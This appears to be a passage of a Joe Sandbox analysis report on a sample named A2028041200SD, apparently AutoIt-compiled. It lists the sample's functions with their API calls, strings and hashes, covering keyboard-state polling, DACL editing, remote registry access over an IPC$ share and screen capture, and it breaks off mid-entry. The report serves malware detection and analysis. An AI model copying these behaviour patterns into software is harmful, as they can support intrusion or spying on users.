Instruction ID: 59f5e33a6657952d53b2f995d7b629907bb92c1b74647293089d1e412cb0115b
Opcode Fuzzy Hash: fddc8baf7ea53b5c933c654ab978843d7abccd40e6a2c4cbe835800759efabf1
Instruction Fuzzy Hash: 7F81AE716053059FDB64EF28C8449AEB7E8BBC8300F14886EF9C9C7259E734D944DB92

Function 0104EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0104EF3B
GetFocus.USER32 ref: 0104EF4B
GetDlgCtrlID.USER32(00000000), ref: 0104EF56
_memset.LIBCMT ref: 0104F081
GetMenuItemInfoW.USER32 ref: 0104F0AC
GetMenuItemCount.USER32(00000000), ref: 0104F0CC
GetMenuItemID.USER32(?,00000000), ref: 0104F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0104F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0104F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0104F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0104F1C8

Strings

0, xrefs: 0104F079

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0fb7820d31b5f44fa79020f33d527c2fb09b8ac2f19cd0cb5944686f3d3c0188
Instruction ID: 9665ccdbbf5295222928f0d116468e862fd3a412ed21b0eb1d03c08533558086
Opcode Fuzzy Hash: 0fb7820d31b5f44fa79020f33d527c2fb09b8ac2f19cd0cb5944686f3d3c0188
Instruction Fuzzy Hash: C8817DB0604302AFE721CF18C8C4AABBBE4FB89314F04456EF9D5972A1D775D905CB62

Function 0101A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0101ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0101ABD7
Part of subcall function 0101ABBB: GetLastError.KERNEL32(?,0101A69F,?,?,?), ref: 0101ABE1
Part of subcall function 0101ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0101A69F,?,?,?), ref: 0101ABF0
Part of subcall function 0101ABBB: HeapAlloc.KERNEL32(00000000,?,0101A69F,?,?,?), ref: 0101ABF7
Part of subcall function 0101ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0101AC0E

Part of subcall function 0101AC56: GetProcessHeap.KERNEL32(00000008,0101A6B5,00000000,00000000,?,0101A6B5,?), ref: 0101AC62
Part of subcall function 0101AC56: HeapAlloc.KERNEL32(00000000,?,0101A6B5,?), ref: 0101AC69
Part of subcall function 0101AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0101A6B5,?), ref: 0101AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0101A8CB
_memset.LIBCMT ref: 0101A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101A8FF
GetLengthSid.ADVAPI32(?), ref: 0101A910
GetAce.ADVAPI32(?,00000000,?), ref: 0101A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0101A969
GetLengthSid.ADVAPI32(?), ref: 0101A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0101A995
HeapAlloc.KERNEL32(00000000), ref: 0101A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101A9BD
CopySid.ADVAPI32(00000000), ref: 0101A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0101A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0101AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0101AA2F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1cca20c1793a9d3870f1930342ef7db66be5dc21cad81660d154f753fe9a4c50
Instruction ID: 5eb0b2fcf93180542f4cd32f0c9370f456134a3cf6feaffd0706576756f61067
Opcode Fuzzy Hash: 1cca20c1793a9d3870f1930342ef7db66be5dc21cad81660d154f753fe9a4c50
Instruction Fuzzy Hash: 96515F71A0124AEFEF10DF94DD84EEEBBBAFF04200F048159F995A7294D7399A05CB60

Function 01039DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 01039E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01039E42
CreateCompatibleDC.GDI32(?), ref: 01039E4E
SelectObject.GDI32(00000000,?), ref: 01039E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01039EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 01039EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01039F0F
SelectObject.GDI32(00000006,?), ref: 01039F17
DeleteObject.GDI32(?), ref: 01039F20
DeleteDC.GDI32(00000006), ref: 01039F27
ReleaseDC.USER32(00000000,?), ref: 01039F32

Strings

(, xrefs: 01039ED7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b314aadf749b8e3d040d9a74c5ea231c6ebac32e831642fa3fa7990f9afd6761
Instruction ID: 2880b150b146f14e71d22940105d252e1d1c3fa6bbe8614a32f966769b458cd8
Opcode Fuzzy Hash: b314aadf749b8e3d040d9a74c5ea231c6ebac32e831642fa3fa7990f9afd6761
Instruction Fuzzy Hash: 41515E75A04309EFDB24CFA8C885EAEBBB9FF48710F14841DF99A97250C775A941CB60

Function 0102CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0102CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0102CCC5
__swprintf.LIBCMT ref: 0102CD1E
__swprintf.LIBCMT ref: 0102CD37
_wprintf.LIBCMT ref: 0102CDED
_wprintf.LIBCMT ref: 0102CE0B

Strings

Error: , xrefs: 0102CDB5
"%s" (%d) : ==> %s:, xrefs: 0102CE06
"%s" (%d) : ==> %s:%s%s, xrefs: 0102CDE8
^ ERROR, xrefs: 0102CD8F
Line %d (File "%s"):, xrefs: 0102CD18, 0102CD31

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 10bf3670bed833da0e72fa6f3dd3c7a44862b6d21a19bfcaf3770904bb3eb3e0
Instruction ID: 11fb84ee047112f57b32079e5e21b3e52792ceebbf5cb5ae2d1291ffea218e6d
Opcode Fuzzy Hash: 10bf3670bed833da0e72fa6f3dd3c7a44862b6d21a19bfcaf3770904bb3eb3e0
Instruction Fuzzy Hash: EA51CE31900159BADF15FBE1CE42EEEBB78AF04304F100166F54576091EB796E59EFA0

Function 0102CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0102CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0102CAB0
__swprintf.LIBCMT ref: 0102CB09
__swprintf.LIBCMT ref: 0102CB22
_wprintf.LIBCMT ref: 0102CBCD
_wprintf.LIBCMT ref: 0102CBEB

Strings

Error: , xrefs: 0102CB95
"%s" (%d) : ==> %s:, xrefs: 0102CBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 0102CBC8
^ ERROR , xrefs: 0102CB64
Line %d (File "%s"):, xrefs: 0102CB03, 0102CB1C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 0df940f14c93a695d055d22b0961c604b66c46f1a5004886216b5b9bec512b2d
Instruction ID: 937afe9d671fc70788a47d29cbce55e97af64a3aced5acbd02bca05f74dd1b33
Opcode Fuzzy Hash: 0df940f14c93a695d055d22b0961c604b66c46f1a5004886216b5b9bec512b2d
Instruction Fuzzy Hash: 1D51F131900659BAEF25EBE1CE42EEEB778AF04344F100066F14576091EB796F59EFA0

Function 010255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010255D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01025664
GetMenuItemCount.USER32(010A1708), ref: 010256ED
DeleteMenu.USER32(010A1708,00000005,00000000,000000F5,?,?), ref: 0102577D
DeleteMenu.USER32(010A1708,00000004,00000000), ref: 01025785
DeleteMenu.USER32(010A1708,00000006,00000000), ref: 0102578D
DeleteMenu.USER32(010A1708,00000003,00000000), ref: 01025795
GetMenuItemCount.USER32(010A1708), ref: 0102579D
SetMenuItemInfoW.USER32(010A1708,00000004,00000000,00000030), ref: 010257D3
GetCursorPos.USER32(?), ref: 010257DD
SetForegroundWindow.USER32(00000000), ref: 010257E6
TrackPopupMenuEx.USER32(010A1708,00000000,?,00000000,00000000,00000000), ref: 010257F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01025805

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 9b68fe3e7c415069f2097d2900639724a6e815f340367c599396910661425e8b
Instruction ID: f6ffd447ee9fd73722260752a5ef2e3ca43783ab4e9bd981414c2db908676211
Opcode Fuzzy Hash: 9b68fe3e7c415069f2097d2900639724a6e815f340367c599396910661425e8b
Instruction Fuzzy Hash: FD71E770640225BEFB319B59EC48FEABFA5FF04768F144246F698AB1D0C7B15810CB98

Function 0101A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0101A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0101A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0101A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0101A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0101A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101A2AB

Strings

\IPC$, xrefs: 0101A1F3
SOFTWARE\Classes\, xrefs: 0101A17D
\CLSID, xrefs: 0101A193

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 3e70ef8a133b09409089b9156e7d51ac717156c342b0fcc4126cd3d687bf2f95
Instruction ID: 5edec732811fbfaa5a44f77966b4a1ef879755a7fe5f917928b4bcbd07296148
Opcode Fuzzy Hash: 3e70ef8a133b09409089b9156e7d51ac717156c342b0fcc4126cd3d687bf2f95
Instruction Fuzzy Hash: 82416B72D11268ABDF21EBA5DC85DEEB7B8FF04740F004069F941B7160DB789A05DB90

Function 01043C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,01042BB5,?,?), ref: 01043C1D

Strings

HKEY_CURRENT_CONFIG, xrefs: 01043CC0
HKEY_CURRENT_USER, xrefs: 01043CE2
HKU, xrefs: 01043D15
HKEY_USERS, xrefs: 01043D04
HKCC, xrefs: 01043CD1
HKEY_LOCAL_MACHINE, xrefs: 01043C6C
HKEY_CLASSES_ROOT, xrefs: 01043C96
HKCU, xrefs: 01043CF3
HKCR, xrefs: 01043CAB
HKLM, xrefs: 01043C81

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 4415b400494211e9c500958cb44846580dec700fd4afe3a9da20b3fcbd0b430c
Instruction ID: 8f4569ce5443c2d316a3981460dbcad93610310bd1ec897580ff2d88e4e748bc
Opcode Fuzzy Hash: 4415b400494211e9c500958cb44846580dec700fd4afe3a9da20b3fcbd0b430c
Instruction Fuzzy Hash: 12416A7010029A9BDF15EF54ED91AEB3365BF12340F4018A4FCE55B2A2EBB4A90ADB50

Function 010225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,010536F4,00000010,?,Bad directive syntax error,0107DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 010225D6
LoadStringW.USER32(00000000,?,010536F4,00000010), ref: 010225DD
_wprintf.LIBCMT ref: 01022610
__swprintf.LIBCMT ref: 01022632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 010226A1

Strings

Error: , xrefs: 0102266F
Line %d:, xrefs: 0102262C
%s (%d) : ==> %s.: %s %s, xrefs: 0102260B
., xrefs: 01022687
Line %d (File "%s"):, xrefs: 01022647

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: d1ab7f7aaa2e6026378c538356240b71ccec6e27823eec5037fa522dc5507d4e
Instruction ID: 1da34f2b2c9682de3cdb32f0bcf92142278004b06eed57d0eda4146dc7e71102
Opcode Fuzzy Hash: d1ab7f7aaa2e6026378c538356240b71ccec6e27823eec5037fa522dc5507d4e
Instruction Fuzzy Hash: 7021803290025ABFDF22BF91CC0AEEE7B79BF18704F004459F5856A0A2DA75A615EF50

Function 01027AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01027B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01027B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01027B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01027B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 01027B8C

Strings

play PlayMe wait, xrefs: 01027B76
status PlayMe mode, xrefs: 01027B3D
play PlayMe, xrefs: 01027B87
close PlayMe, xrefs: 01027B53, 01027B80
open , xrefs: 01027AF1
alias PlayMe, xrefs: 01027B1B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 93a97d325b1b7961a3c338da2bc98280139d278563543c7df087855ee76aaf95
Instruction ID: aca3e88a25d65a2f5b4912e0fd0069dc6b492e8aa3a2152c27a5d3ba87633f9e
Opcode Fuzzy Hash: 93a97d325b1b7961a3c338da2bc98280139d278563543c7df087855ee76aaf95
Instruction Fuzzy Hash: 6011C8606401A979DB30B377CC5AEFFBABCFBD1B00F000419B551AA0D1DA640945DAB1

Function 0102778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 01027794

Part of subcall function 00FFDC38: timeGetTime.WINMM(?,75A8B400,010558AB), ref: 00FFDC3C

Sleep.KERNEL32(0000000A), ref: 010277C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 010277E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 01027806
SetActiveWindow.USER32 ref: 01027825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01027833
SendMessageW.USER32(00000010,00000000,00000000), ref: 01027852
Sleep.KERNEL32(000000FA), ref: 0102785D
IsWindow.USER32 ref: 01027869
EndDialog.USER32(00000000), ref: 0102787A

Strings

BUTTON, xrefs: 010277F8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ee2e5cee6442669968751d4ee8ab2e1a4f2084371deb95d0f81002ec110ee158
Instruction ID: 53f7bf82e491feb78f7ae47e1ed4cd5aea834854e3969f0860fa8854e6deb4f9
Opcode Fuzzy Hash: ee2e5cee6442669968751d4ee8ab2e1a4f2084371deb95d0f81002ec110ee158
Instruction Fuzzy Hash: 1A21C371344609AFE7255B61EC88F2A7F79FB15348F804124F5C68A269DBBB4C00DB21

Function 010302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

CoInitialize.OLE32(00000000), ref: 0103034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 010303DE
SHGetDesktopFolder.SHELL32(?), ref: 010303F2
CoCreateInstance.OLE32(0106DA8C,00000000,00000001,01093CF8,?), ref: 0103043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 010304AD
CoTaskMemFree.OLE32(?,?), ref: 01030505
_memset.LIBCMT ref: 01030542
SHBrowseForFolderW.SHELL32(?), ref: 0103057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 010305A1
CoTaskMemFree.OLE32(00000000), ref: 010305A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 010305DF
CoUninitialize.OLE32(00000001,00000000), ref: 010305E1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 374910042cf6b391a8cc8585f83b64010c89922e978b9265a7a4be3db242d967
Instruction ID: f7566d486652463f163fcbff579891704435b0e7780bbc6b628f6cf443f253ca
Opcode Fuzzy Hash: 374910042cf6b391a8cc8585f83b64010c89922e978b9265a7a4be3db242d967
Instruction Fuzzy Hash: 59B1FA75A00209AFDB14DFA5C888EAEBBF9FF88304B048499F945EB251DB75ED41CB50

Function 01022E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 01022ED6
SetKeyboardState.USER32(?), ref: 01022F41
GetAsyncKeyState.USER32(000000A0), ref: 01022F61
GetKeyState.USER32(000000A0), ref: 01022F78
GetAsyncKeyState.USER32(000000A1), ref: 01022FA7
GetKeyState.USER32(000000A1), ref: 01022FB8
GetAsyncKeyState.USER32(00000011), ref: 01022FE4
GetKeyState.USER32(00000011), ref: 01022FF2
GetAsyncKeyState.USER32(00000012), ref: 0102301B
GetKeyState.USER32(00000012), ref: 01023029
GetAsyncKeyState.USER32(0000005B), ref: 01023052
GetKeyState.USER32(0000005B), ref: 01023060

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 356fdef98436b954c798212420e9dcad16a326d44bc8cc9bd9737583b6031042
Instruction ID: c6b43663ae6a6d137a29d0a7cd2dc11483020fbacc10dcc2170eac18096826ce
Opcode Fuzzy Hash: 356fdef98436b954c798212420e9dcad16a326d44bc8cc9bd9737583b6031042
Instruction Fuzzy Hash: 5F51F720A047A829FF75DBE88450BEABFF46F15340F0845DED6C25A1C2DA98974CCB62

Function 0101ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

